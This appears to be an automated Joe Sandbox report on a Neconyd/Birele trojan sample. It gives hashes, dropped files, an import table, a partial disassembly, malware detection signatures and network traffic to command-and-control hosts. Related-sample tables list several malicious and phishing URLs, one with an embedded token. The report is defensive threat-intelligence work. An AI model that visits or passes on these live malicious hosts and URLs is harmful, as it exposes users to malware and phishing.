                http://lousta.net/352/26.htmle1Nomsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                193.166.255.171
                lousta.netFinland
                1741FUNETASFItrue
                52.34.198.229
                ow5dirasuek.comUnited States
                16509AMAZON-02UStrue
                15.197.204.56
                mkkuei4kdsz.comUnited States
                7430TANDEMUStrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1569326
                Start date and time:2024-12-05 18:03:12 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 4m 40s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:16
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:cOviNFmw21.exe
                renamed because original name is a hash value
                Original Sample Name:7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f.exe
                Detection:MAL
                Classification:mal100.bank.troj.evad.winEXE@7/3@3/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 23
                • Number of non-executed functions: 69
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: cOviNFmw21.exe
                TimeTypeDescription
                12:04:09API Interceptor12x Sleep call for process: omsecor.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                193.166.255.171nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                • lousta.net/691/461.html
                bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                • lousta.net/562/252.html
                HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                • lousta.net/989/145.html
                Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                Update-KB4890-x86.exeGet hashmaliciousUnknownBrowse
                • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                document.log.scr.exeGet hashmaliciousUnknownBrowse
                • www4.cedesunjerinkas.com/chr/wtb/lt.exe
                yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                • www.synetik.net/
                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                • lousta.net/161/343.html
                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • lousta.net/372/625.html
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • lousta.net/766/881.html
                52.34.198.2298dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                • lygyvuj.com/login.php
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                ow5dirasuek.comnNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                djvu452.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                gdvfd35.exeGet hashmaliciousNeconydBrowse
                • 52.34.198.229
                mkkuei4kdsz.comnNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                • 15.197.204.56
                bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                • 15.197.204.56
                HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                • 15.197.204.56
                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                djvu452.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                gdvfd35.exeGet hashmaliciousNeconydBrowse
                • 64.225.91.73
                lousta.netnNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                cnzWgjUhS2.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                Z0rY97IU6r.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                2VJZxIY76V.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                qIIGdGOTWO.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                O0prB0zCWi.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                djvu452.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                v48ge.exeGet hashmaliciousNeconydBrowse
                • 193.166.255.171
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                FUNETASFIarmv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 130.234.121.110
                sora.ppc.elfGet hashmaliciousMiraiBrowse
                • 86.50.103.12
                ppc.elfGet hashmaliciousMiraiBrowse
                • 153.1.142.240
                loligang.mpsl-20241128-1536.elfGet hashmaliciousMiraiBrowse
                • 192.98.111.96
                x86.elfGet hashmaliciousMirai, MoobotBrowse
                • 153.1.142.236
                arm7.elfGet hashmaliciousUnknownBrowse
                • 128.215.188.75
                la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                • 153.1.77.176
                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                • 128.214.247.115
                x86.elfGet hashmaliciousUnknownBrowse
                • 86.50.90.19
                qkbfi86.elfGet hashmaliciousMiraiBrowse
                • 193.167.161.244
                AMAZON-02UShttps://ln5.sync.com/dl/3c61e3b30#gum48d7j-5vgyh9gy-tcjv9rp4-ffxvqp5fGet hashmaliciousUnknownBrowse
                • 15.222.106.233
                https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                • 108.158.75.11
                http://kitces.emlnk1.comGet hashmaliciousUnknownBrowse
                • 13.227.9.168
                https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                • 13.250.84.149
                https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBDGet hashmaliciousHTMLPhisherBrowse
                • 63.32.181.175
                mpsl.elfGet hashmaliciousUnknownBrowse
                • 54.171.230.55
                https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8znGet hashmaliciousHTMLPhisherBrowse
                • 52.48.36.35
                mips.elfGet hashmaliciousUnknownBrowse
                • 54.171.230.55
                https://accountsgoogle.me/cytech_developmentoperations-9d2f3a8e-7107-4b29-bc58-905af4e7e1c2/462/?id=16068&key=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6Im5hb3JyQHd0ZWEuY29tIiwiZXhwIjoxNzMxOTk2NzIzfQ.MoKjLaA6U4Hn3-TNwpA9VoBbllSNTwKl2--0wdNbn04/Get hashmaliciousUnknownBrowse
                • 52.92.35.218
                Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msgGet hashmaliciousUnknownBrowse
                • 3.74.173.78
                TANDEMUSDoc Copy-PTD- P2139 INV- P2238.emlGet hashmaliciousUnknownBrowse
                • 15.197.213.252
                https://bdb142c8309e44b2310105b0e00240d6.surge.sh/Get hashmaliciousUnknownBrowse
                • 15.197.193.217
                AudioplaybackVM--00-32AoTranscript.htmlGet hashmaliciousUnknownBrowse
                • 15.197.142.173
                http://frame.wtfGet hashmaliciousUnknownBrowse
                • 15.197.204.56
                V-Mail.msgGet hashmaliciousUnknownBrowse
                • 15.197.142.173
                https://protect.checkpoint.com/v2/r01/___https:/vlp6cm34.r.us-east-1.awstrack.me/Q5dmyyux:e7Ke7Kjrfnq.ynintwjuqD.htr*7Kh*7KjOBJBJLTmXFRFSIYBSOlvWZ1QLgoUfHylhY/JnF_riAUpCWczNA0yO_jaB*~*oG6AYM23pBoyDNMJ-PJR-NmPFsN*~*VgZA/PF0HUyICotYzOGFnKvZNBMhC*~*KfYclayEc_La*~*ccZq7wY-S_IKBLwx/KWAAv8MVfzRwNM6LCN8Jigf*~*80C6gkuabRjmLM--7qPAcOAlUFFI__5pCS9Bd6d565556c8b*~*/hi595-9hb*~3*gh-a*~*bg-9bgb-ci5/-b9jf76k5b9g*~*-555555do29l0Y3hHjFJM3POpxyJsMjDY*~*5=957___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmNkMzFiOWRiNjRlNzYwZWExOWZkZjZlZWU4YmI5NjkyOjc6NjQxYjozOTM5M2Y5MjlmZWNkMGUzMGYzMjUxMGFiZDQ0YjU2Mzg5ODdlNDNlNTAyN2VlYjBmMjQxZjc3Mjg5OGNiMWQxOmg6VDpU%3EGet hashmaliciousUnknownBrowse
                • 15.197.142.173
                http://ar-oracle.comGet hashmaliciousUnknownBrowse
                • 15.197.148.33
                https://happythnkxgiving.appforconstruction.com/KgeM3Get hashmaliciousUnknownBrowse
                • 15.197.240.20
                http://idiomas.astalaweb.com/otros/Portugu%C3%A9s/Comunicacion-verbos-en-portugues.aspGet hashmaliciousUnknownBrowse
                • 15.197.179.7
                http://svchorst.comGet hashmaliciousUnknownBrowse
                • 15.197.130.221
                No context
                No context
                Process:C:\Users\user\Desktop\cOviNFmw21.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):4.700261069108173
                Encrypted:false
                SSDEEP:768:gMEIvFGvZEr8LFK0ic46N47eSdYAHwmZwSp6JXXlaa5uA:gbIvYvZEyFKF6N4yS+AQmZcl/5
                MD5:9CB842FFDA5CC91A433FD8C8655C0678
                SHA1:9A94A3A65ADE88A164E0D7ED451D26B7AF41F6FB
                SHA-256:99C4637BFD77D17EC3A9D8A7D95C65C8045720A083F6741776AA8147ACF89C99
                SHA-512:D24054996135B838E73C795A5FBDC1054D985E56E7C9743501D8F46AF071292C98AEF444733BBD07F9B08613FD92B3459453B0D648B0C037D94347F7D9075409
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 96%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L...*.P............................F.............@.........................................................................|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\omsecor.exe
                File Type:data
                Category:dropped
                Size (bytes):100
                Entropy (8bit):1.8777353867706772
                Encrypted:false
                SSDEEP:3:gtqyumdZp8zFmLV:gwDmL+zFmx
                MD5:7BEA8C5EE2FE04D87297BECD6315EA16
                SHA1:7FF580C4573D8DFABBCD7E5F01B20F64BE6FC40D
                SHA-256:91A102D381A67E229350136926A23C0A4F25245DC3CB1C199C08D16845201782
                SHA-512:7B795789B138A8FE45C6CF6368A105292DA520F6483BA446CBE03F5C011AFFE15326885DEBAF604AB6F59BD293A23876D9083B82577B9EA6DA97200900D58AC2
                Malicious:false
                Reputation:low
                Preview:-x.x.x.x.x.x6x.x.xxxIxKxKxOxOx@xAxOxKxNx@xKxLxJxOx@xNxHxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
                Process:C:\Users\user\AppData\Roaming\omsecor.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):4.700257409382838
                Encrypted:false
                SSDEEP:768:TMEIvFGvZEr8LFK0ic46N47eSdYAHwmZwSp6JXXlaa5uA:TbIvYvZEyFKF6N4yS+AQmZcl/5
                MD5:647527DE20AF8BB173C26019E8811EED
                SHA1:94665B1D056473F1F209127995ACDE6AD83B7916
                SHA-256:552EDA5BFCFCAFD98BB4DF40AD07D19E9FEC270B31DF8888DAF865FE91B99127
                SHA-512:8B44ED709643DF262C700C549F225E4E1A745302BF29DBB3C9E252ADE696E5CE910A46C59D7B8131BAC76D7168826BF1969C3D9A880182BC3E4FE0A756477762
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m.m.m.m...m.m.m...mRich...m................PE..L.....P............................F.............@.........................................................................|...........................................................................@............................................text............................... ..`.rdata..D!......."..................@..@.data...,q..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):4.700177279604877
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:cOviNFmw21.exe
                File size:65'536 bytes
                MD5:73e5f0f01bf8368b8b82432b027610e5
                SHA1:ecf068b47a2747e0ef0286c6f9d03f2f8aacfaa7
                SHA256:7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f
                SHA512:46d0172face375c9f10315a571080a1d6af155e4b7209eafb8caf5b90e9761219afeffa54eff935b5d915b009bfbfefe65bd4ee0c7f8207c21291d74f0726791
                SSDEEP:768:NMEIvFGvZEr8LFK0ic46N47eSdYAHwmZwSp6JXXlaa5uA:NbIvYvZEyFKF6N4yS+AQmZcl/5
                TLSH:CB538D9472F9803AE2B20D745D7E988189BEBD7826F0C5C6D3115C8B6DB46C2D53B3A3
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>...m...m...m.m.m...m.m.m...m^..m...m^..m...m...m...m.m.m...m.m.m...mRich...m................PE..L......P...................
                Icon Hash:00928e8e8686b000
                Entrypoint:0x40b346
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:
                Time Stamp:0x50B1DFF8 [Sun Nov 25 09:08:08 2012 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:08b67a9663d3a8c9505f3b2561bbdd1c
                Instruction
                push ebp
                mov ebp, esp
                mov eax, 00001800h
                call 00007FBE948D94C2h
                push ebx
                push esi
                push edi
                mov edi, dword ptr [0040E0B0h]
                mov esi, 00000400h
                push esi
                lea eax, dword ptr [ebp-00000800h]
                push eax
                xor ebx, ebx
                push ebx
                call edi
                push 0040F4FCh
                lea eax, dword ptr [ebp-00000800h]
                call 00007FBE948D137Ah
                test eax, eax
                pop ecx
                je 00007FBE948D72BFh
                lea eax, dword ptr [ebp-00001800h]
                push eax
                call 00007FBE948D6AF6h
                test eax, eax
                pop ecx
                jne 00007FBE948D72AEh
                push esi
                lea eax, dword ptr [ebp-00000800h]
                push eax
                push ebx
                call edi
                push 00000001h
                lea eax, dword ptr [ebp-00000800h]
                push eax
                push 0040F414h
                push 0040F1D8h
                push 80000001h
                call 00007FBE948D28A6h
                add esp, 14h
                test eax, eax
                push 00000004h
                je 00007FBE948D7267h
                push ebx
                push 00000003h
                jmp 00007FBE948D726Bh
                call dword ptr [0040E064h]
                push eax
                push 00000006h
                call 00007FBE948D6613h
                add esp, 0Ch
                call 00007FBE948D7153h
                call 00007FBE948D697Dh
                test eax, eax
                jne 00007FBE948D7254h
                call 00007FBE948D69F3h
                test eax, eax
                je 00007FBE948D72C3h
                push 00002710h
                call dword ptr [0040E070h]
                push 00000004h
                push ebx
                push 00000009h
                call 00007FBE948D65E4h
                add esp, 0Ch
                push esi
                lea eax, dword ptr [ebp+00000000h]
                Programming Language:
                • [ASM] VS2005 build 50727
                • [ C ] VS2005 build 50727
                • [LNK] VS2005 build 50727
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xf77c0xb4.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xf6a80x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0xe0000x1b4.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000xcc180xce00714a894e8b5f787903d790e888652926False0.3713971480582524data4.766581687246585IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0xe0000x21440x220080dd2fa89c5c981edf446c3b17f9e467False0.4460018382352941data4.452292898356236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0x110000x1712c0x2009159e4683d74ea27f29c3b096294f663False0.466796875data3.7016590486098133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLLImport
                WININET.dllHttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
                SHLWAPI.dllStrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
                KERNEL32.dllTerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
                USER32.dllGetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
                ADVAPI32.dllRegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
                SHELL32.dllSHGetFolderPathW
                ole32.dllCoCreateInstance, OleInitialize, CoInitialize
                OLEAUT32.dllSysFreeString, VariantInit, SysAllocString, VariantClear
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-12-05T18:04:08.431834+01002016998ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host)1192.168.2.749699193.166.255.17180TCP
                2024-12-05T18:04:10.619663+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749699193.166.255.17180TCP
                2024-12-05T18:04:32.754783+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749700193.166.255.17180TCP
                2024-12-05T18:04:34.471615+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74974215.197.204.5680TCP
                2024-12-05T18:04:36.659210+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74974852.34.198.22980TCP
                2024-12-05T18:04:36.659257+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz152.34.198.22980192.168.2.749748TCP
                2024-12-05T18:04:36.659257+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst152.34.198.22980192.168.2.749748TCP
                2024-12-05T18:04:59.095440+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749754193.166.255.17180TCP
                2024-12-05T18:05:21.253614+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749803193.166.255.17180TCP
                2024-12-05T18:05:22.615655+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74985115.197.204.5680TCP
                2024-12-05T18:05:24.218147+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74985752.34.198.22980TCP
                2024-12-05T18:05:46.346450+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749862193.166.255.17180TCP
                2024-12-05T18:06:08.472191+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.749913193.166.255.17180TCP
                2024-12-05T18:06:09.821016+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74996515.197.204.5680TCP
                2024-12-05T18:06:11.428062+01002015786ET MALWARE Ransom.Win32.Birele.gsg Checkin1192.168.2.74996952.34.198.22980TCP
                TimestampSource PortDest PortSource IPDest IP
                Dec 5, 2024 18:04:08.431833982 CET4969980192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:08.551768064 CET8049699193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:08.551852942 CET4969980192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:08.552088976 CET4969980192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:08.915066957 CET4969980192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:09.274391890 CET4969980192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:09.395318985 CET8049699193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:09.432813883 CET8049699193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:09.435251951 CET8049699193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:10.619582891 CET8049699193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:10.619663000 CET4969980192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:10.620363951 CET4969980192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:10.729116917 CET4970080192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:10.740194082 CET8049699193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:10.849241972 CET8049700193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:10.849334955 CET4970080192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:10.849632978 CET4970080192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:10.975996971 CET8049700193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:32.753890991 CET8049700193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:32.754782915 CET4970080192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:32.754906893 CET4970080192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:32.875406981 CET8049700193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:33.247921944 CET4974280192.168.2.715.197.204.56
                Dec 5, 2024 18:04:33.367659092 CET804974215.197.204.56192.168.2.7
                Dec 5, 2024 18:04:33.367744923 CET4974280192.168.2.715.197.204.56
                Dec 5, 2024 18:04:33.367984056 CET4974280192.168.2.715.197.204.56
                Dec 5, 2024 18:04:33.487716913 CET804974215.197.204.56192.168.2.7
                Dec 5, 2024 18:04:34.471554995 CET804974215.197.204.56192.168.2.7
                Dec 5, 2024 18:04:34.471615076 CET4974280192.168.2.715.197.204.56
                Dec 5, 2024 18:04:35.173968077 CET4974880192.168.2.752.34.198.229
                Dec 5, 2024 18:04:35.294101000 CET804974852.34.198.229192.168.2.7
                Dec 5, 2024 18:04:35.294208050 CET4974880192.168.2.752.34.198.229
                Dec 5, 2024 18:04:35.294480085 CET4974880192.168.2.752.34.198.229
                Dec 5, 2024 18:04:35.414170027 CET804974852.34.198.229192.168.2.7
                Dec 5, 2024 18:04:36.659149885 CET804974852.34.198.229192.168.2.7
                Dec 5, 2024 18:04:36.659209967 CET4974880192.168.2.752.34.198.229
                Dec 5, 2024 18:04:36.659256935 CET804974852.34.198.229192.168.2.7
                Dec 5, 2024 18:04:36.659306049 CET4974880192.168.2.752.34.198.229
                Dec 5, 2024 18:04:36.663953066 CET4974880192.168.2.752.34.198.229
                Dec 5, 2024 18:04:36.783663034 CET804974852.34.198.229192.168.2.7
                Dec 5, 2024 18:04:37.054436922 CET4974280192.168.2.715.197.204.56
                Dec 5, 2024 18:04:37.063429117 CET4975480192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:37.183795929 CET8049754193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:37.185534000 CET4975480192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:37.187115908 CET4975480192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:37.306962967 CET8049754193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:59.095341921 CET8049754193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:59.095439911 CET4975480192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:59.096461058 CET4975480192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:59.214235067 CET4980380192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:59.216355085 CET8049754193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:59.334084034 CET8049803193.166.255.171192.168.2.7
                Dec 5, 2024 18:04:59.334197998 CET4980380192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:59.334496975 CET4980380192.168.2.7193.166.255.171
                Dec 5, 2024 18:04:59.454387903 CET8049803193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:21.253506899 CET8049803193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:21.253613949 CET4980380192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:21.254290104 CET4980380192.168.2.7193.166.255.171
                Dec 5, 2024 18:05:21.373411894 CET4985180192.168.2.715.197.204.56
                Dec 5, 2024 18:05:21.375205994 CET8049803193.166.255.171192.168.2.7
                Dec 5, 2024 18:05:21.493297100 CET804985115.197.204.56192.168.2.7
                Dec 5, 2024 18:05:21.493427038 CET4985180192.168.2.715.197.204.56
                Dec 5, 2024 18:05:21.493674040 CET4985180192.168.2.715.197.204.56
